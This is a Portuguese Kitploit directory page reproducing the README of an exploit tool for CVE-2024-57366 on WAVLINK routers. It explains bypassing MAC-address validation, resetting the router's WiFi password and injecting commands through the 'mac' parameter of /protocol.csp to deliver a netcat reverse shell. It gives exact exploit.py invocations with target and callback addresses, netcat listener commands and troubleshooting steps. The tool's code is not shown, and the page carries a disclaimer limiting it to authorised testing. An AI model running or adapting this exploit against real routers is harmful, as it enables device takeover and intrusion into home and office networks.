Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-57366 — Exploração de execução remota de código para CVE-2024-57366 direcionada a roteadores WAVLINK por meio de bypass de validação de endereço MAC e injeção de comandos, com registro automático em WiFi e entrega de payload de shell reverso. | Kitploit
Ferramentas/GitHubGitHub/h4ckusaur/cve-2024-57366
Segurança IoTAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança Sem FioTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHubh4ckusaur/cve-2024-57366

CVE-2024-57366

Exploração de execução remota de código para CVE-2024-57366 direcionada a roteadores WAVLINK por meio de bypass de validação de endereço MAC e injeção de comandos, com registro automático em WiFi e entrega de payload de shell reverso.

2há 11 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

Exploit CVE-2024-57366

Um exploit robusto para CVE-2024-57366 que permite execução remota de código em roteadores vulneráveis através de bypass de validação de endereço MAC e injeção de comandos.

Este é um exploit pós-autorização que requer que o recurso "Controle Remoto" do roteador esteja ativado e a senha administrativa. O nome de usuário administrativo é codificado como "admin".

🚀 Funcionalidades

  • Registro automático de endereço MAC - Conecta-se ao WiFi para registrar o endereço MAC no roteador
  • Exploit que preserva a rede - Mantém suas conexões de rede existentes durante o exploit
  • Cache de endereço MAC - Exploits repetidos rápidos usando endereços MAC bem-sucedidos em cache
  • Compatível com BurpSuite - Corresponde ao formato exato de requisição para máxima confiabilidade
  • Tratamento de timeout - Mensagens úteis quando conexões reverse shell são esperadas
  • Amigável - Cache de endereço MAC simples baseado em texto para fácil gerenciamento

📋 Requisitos

  • Python 3.6+
  • Sistema Linux com adaptador sem fio
  • Acesso sudo (necessário para gerenciamento de interface de rede)
  • Roteador alvo vulnerável ao CVE-2024-57366

🛠️ Instalação

  1. Clone ou baixe os arquivos do exploit
  2. Certifique-se de ter os pacotes Python necessários:
    root@kitploit:~
    pip3 install requests
    

🎯 Uso

Exploit Básico (Primeira Vez)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

Exploit Rápido (Usando MAC em Cache)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# O script perguntará: "Use cached MAC for quick exploit? (y/n):" - responda "y"

Forçar Exploit Completo (Ignorar Cache)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full

Listar Endereços MAC em Cache

root@kitploit:~
python3 exploit.py --list-cached

📖 Opções de Linha de Comando

  • --target - Endereço IP do roteador alvo (padrão: 127.0.0.1)
  • --port - Porta do roteador alvo (padrão: 80)
  • --local-ip - Seu endereço IP local para callback reverse shell
  • --local-port - Porta local para callback reverse shell (padrão: 4444)
  • --password - Senha de administrador do roteador
  • --ssid - Nome da rede WiFi (padrão: WAVLINK-Mesh_DC4B)
  • --force-full - Forçar exploit completo, ignorar verificação de MAC em cache
  • --list-cached - Listar endereços MAC em cache e sair

🔧 Como Funciona

Visão Geral Técnica

O CVE-2024-57366 explora um bypass de validação de endereço MAC no firmware do roteador. A vulnerabilidade permite injeção de comandos através do parâmetro mac no endpoint /protocol.csp.

Processo do Exploit

  1. Autenticação - Extrai token de autenticação do roteador
  2. Redefinição de Senha WiFi - Redefine a senha WiFi do roteador para corresponder à senha de administrador
  3. Registro MAC - Conecta-se ao WiFi para registrar o endereço MAC no roteador
  4. Injeção de Comando - Injeta payload reverse shell usando o MAC registrado
  5. Preservação de Rede - Mantém as conexões de rede existentes durante todo o processo

Detalhes Técnicos Principais

  • Bypass de Validação MAC: O roteador valida endereços MAC verificando se eles se conectaram ao WiFi
  • Vinculação de Interface de Rede: Usa a interface eth0 para preservar o contexto de rede original
  • Formato de Requisição: Corresponde exatamente ao formato do BurpSuite (index=1, token no caminho da URL)
  • Payload: Reverse shell Netcat com named pipe para confiabilidade

Cache de Endereço MAC

O exploit armazena automaticamente endereços MAC bem-sucedidos em successful_macs.txt:

root@kitploit:~
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here

32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08

Adição Manual de MAC: Edite successful_macs.txt e adicione linhas como:

root@kitploit:~
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08

🎯 Exemplo de Uso

Primeira Tentativa de Exploit

root@kitploit:~
# Inicie o listener netcat
nc -lvp 4444

# Execute o exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

# Quando solicitado a salvar o endereço MAC, responda "y"

Exploits Subsequentes (Muito Mais Rápidos)

root@kitploit:~
# Inicie o listener netcat
nc -lvp 4444

# Execute o exploit (usará MAC em cache)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Responda "y" quando perguntado sobre usar MAC em cache

🔍 Solução de Problemas

Problemas Comuns

  1. "Nenhum adaptador sem fio encontrado"

    • Certifique-se de ter um adaptador sem fio ativado
    • Verifique se o WiFi está ligado
    • Tente executar com sudo
  2. "Falha na validação do endereço MAC"

    • O endereço MAC precisa estar registrado no roteador
    • Certifique-se de que a etapa de conexão WiFi foi concluída com sucesso
    • Tente conectar-se ao WiFi manualmente primeiro
  3. "Requisição expirou"

    • Isso pode significar que o exploit funcionou!
    • Verifique seu listener netcat por uma conexão reverse shell
    • O roteador pode estar executando o comando, mas não respondendo ao HTTP
  4. "Reverse shell não está conectando"

    • Verifique se seu --local-ip está correto (use ip addr show eth0)
    • Certifique-se de que nenhum firewall está bloqueando a conexão
    • Verifique se o listener netcat está executando na porta correta

Requisitos de Rede

  • Interface eth0: Deve ter um endereço IP para preservação de rede
  • Adaptador sem fio: Necessário para registro MAC inicial
  • Acesso ao roteador: Deve ser capaz de alcançar o roteador via interface eth0

📁 Estrutura de Arquivos

root@kitploit:~
CVE-2024-57366/
├── exploit.py              # Script principal do exploit
├── successful_macs.txt     # Cache de endereço MAC (gerado automaticamente)
└── README.md              # Este arquivo

⚠️ Aviso Legal

Esta ferramenta é apenas para fins educacionais e de teste autorizado. Use apenas em sistemas que você possui ou tem permissão explícita para testar. Os autores não são responsáveis por qualquer uso indevido desta ferramenta.

🔗 Referências

  • CVE-2024-57366
  • Vulnerabilidade de firmware do roteador na validação de endereço MAC
  • Injeção de comando através do endpoint /protocol.csp

📝 Licença

Este projeto é fornecido como está para fins educacionais. Use com responsabilidade e de acordo com as leis e regulamentos aplicáveis.

Baixar ferramenta